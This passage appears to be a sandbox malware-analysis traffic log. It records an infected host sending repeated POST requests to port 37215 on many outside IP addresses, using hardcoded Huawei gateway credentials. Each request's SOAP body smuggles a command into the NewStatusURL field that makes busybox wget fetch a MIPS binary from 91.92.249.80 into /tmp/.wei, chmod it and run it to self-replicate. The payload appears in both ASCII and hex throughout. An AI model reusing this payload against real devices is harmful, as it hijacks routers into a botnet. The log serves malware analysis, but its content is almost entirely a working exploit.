                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1885192.168.2.2357700157.252.216.11537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.553967953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1886192.168.2.235094441.141.101.22237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.554136992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1887192.168.2.2346604197.174.18.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.554194927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1888192.168.2.2356936211.88.34.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.554472923 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1889192.168.2.2344510157.41.98.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.554713964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1890192.168.2.2350086151.157.249.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.555016994 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1891192.168.2.2351458197.135.50.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.557240009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1892192.168.2.2341010197.206.181.12137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.557243109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1893192.168.2.234167841.116.215.11737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.557254076 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1894192.168.2.2358036197.139.35.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.557259083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1895192.168.2.235694641.41.118.13537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.557300091 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
